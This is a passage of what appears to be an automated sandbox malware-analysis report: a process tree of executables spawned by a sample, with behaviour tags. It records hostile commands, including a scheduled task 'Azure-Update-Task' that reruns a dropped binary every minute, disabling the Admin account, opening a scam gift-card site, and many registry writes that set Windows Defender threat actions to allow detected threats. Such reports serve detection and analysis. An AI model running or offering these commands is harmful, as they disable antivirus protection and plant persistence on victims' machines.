                                                                                                                                                                    • C:\Users\Admin\AppData\Local\9de48c23-2f3c-4517-b7ba-aed62f68418d\build3.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\9de48c23-2f3c-4517-b7ba-aed62f68418d\build3.exe"
                                                                                                                                                                      7⤵
                                                                                                                                                                        PID:5540
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\9de48c23-2f3c-4517-b7ba-aed62f68418d\build3.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\9de48c23-2f3c-4517-b7ba-aed62f68418d\build3.exe"
                                                                                                                                                                          8⤵
                                                                                                                                                                            PID:5896
                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                              /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                                                                                                                              9⤵
                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                              PID:3596
                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                  taskkill /f /im explorer.exe
                                                                                                                                                                  3⤵
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                  PID:5576
                                                                                                                                                                • C:\Windows\SysWOW64\net.exe
                                                                                                                                                                  net user Admin /active:no
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:3492
                                                                                                                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                      C:\Windows\system32\net1 user Admin /active:no
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:6204
                                                                                                                                                                    • C:\Windows\SysWOW64\net.exe
                                                                                                                                                                      net user DefaultAccount /active:yes
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:6576
                                                                                                                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                          C:\Windows\system32\net1 user DefaultAccount /active:yes
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:2960
                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://mrbeast-giftcards-gaway.netlify.app/
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:6100
                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb482b3cb8,0x7ffb482b3cc8,0x7ffb482b3cd8
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:3440
                                                                                                                                                                            • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                              xcopy C:\Windows\Fonts C:\Users\Admin\Desktop
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                              PID:2328
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\f7d23f73-dc20-4c37-b6c4-c91b1aea8bb2\packer.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\f7d23f73-dc20-4c37-b6c4-c91b1aea8bb2\packer.exe" "C:\Users\Admin\AppData\Local\Temp\f7d23f73-dc20-4c37-b6c4-c91b1aea8bb2\unpacker.exe" "C:\Users\Admin\AppData\Local\Temp\vir.exe" "!main.cmd" "C:\Users\Admin\AppData\Local\Temp\vir_24093d18-2525-4c5a-8967-ccb4d09f7bfa" "" True True False 0 -repack
                                                                                                                                                                            2⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            PID:3368
                                                                                                                                                                        • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:4820
                                                                                                                                                                          • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:5276
                                                                                                                                                                            • C:\Windows\system32\efsui.exe
                                                                                                                                                                              efsui.exe /efs /keybackup
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                              PID:5392
                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 352 -p 5812 -ip 5812
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:5800
                                                                                                                                                                              • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                                C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                PID:5472
                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                PID:5916
                                                                                                                                                                                • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                  DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{221d482c-b728-f24f-b781-39bd12239536}\droidcamvideo.inf" "9" "41e7d49db" "0000000000000150" "WinSta0\Default" "0000000000000160" "208" "c:\program files (x86)\droidcam\lib"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                  PID:4756
                                                                                                                                                                                • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                  DrvInst.exe "2" "231" "ROOT\MEDIA\0000" "C:\Windows\INF\oem3.inf" "oem3.inf:c14ce8845b5e8bf3:DroidCamVideo.Device:21.4.1.0:droidcamvideo," "41e7d49db" "0000000000000150" "b680"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                  PID:4716
                                                                                                                                                                                • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                  DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{cc5e9632-5427-874f-85ac-39d4ed986580}\droidcam.inf" "9" "4e67c8bbf" "0000000000000178" "WinSta0\Default" "000000000000016C" "208" "c:\program files (x86)\droidcam\lib"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                  PID:4796
                                                                                                                                                                                • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                  DrvInst.exe "2" "231" "ROOT\MEDIA\0001" "C:\Windows\INF\oem4.inf" "oem4.inf:ed86ca11f01d07d6:DroidCam_PCMEX:1.0.0.0:droidcam," "4e67c8bbf" "0000000000000178" "b680"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Drops file in Drivers directory
                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                  PID:2940
                                                                                                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                                                                                                C:\Windows\System32\svchost.exe -k CameraMonitor
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:5372
                                                                                                                                                                                • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                                  C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                  PID:1164
                                                                                                                                                                                • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                                  C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                  PID:232
                                                                                                                                                                                • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                                  C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                  PID:6268
                                                                                                                                                                                • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                                                  C:\Windows\system32\AUDIODG.EXE 0x00000000000004DC 0x00000000000004D0
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:6364
                                                                                                                                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:3044
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSF364.tmp\Install.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7zSF364.tmp\Install.exe z3 /VdidyuOe 385104 /S
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                      PID:4940
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:256
                                                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Indirect Command Execution
                                                                                                                                                                                            PID:6256
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                              PID:6308
                                                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                PID:1936
                                                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Indirect Command Execution
                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                            PID:3200
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:6768
                                                                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:2932
                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • Indirect Command Execution
                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                PID:5352
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:5184
                                                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                        PID:6240
                                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Indirect Command Execution
                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                    PID:2960
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:6576
                                                                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                            PID:1384
                                                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • Indirect Command Execution
                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                        PID:6336
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:6332
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                              PID:6180
                                                                                                                                                                                                              • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                  PID:3728
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                          PID:2808
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:6120
                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                  PID:4172
                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                PID:6336
                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:4832
                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:5480
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:3676
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:2812
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:6192
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                          PID:5136
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:1772
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                            PID:5296
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                            PID:1072
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:4992
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                              PID:3812
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:4172
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:6928
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                  PID:6120
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                  PID:400
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:2800
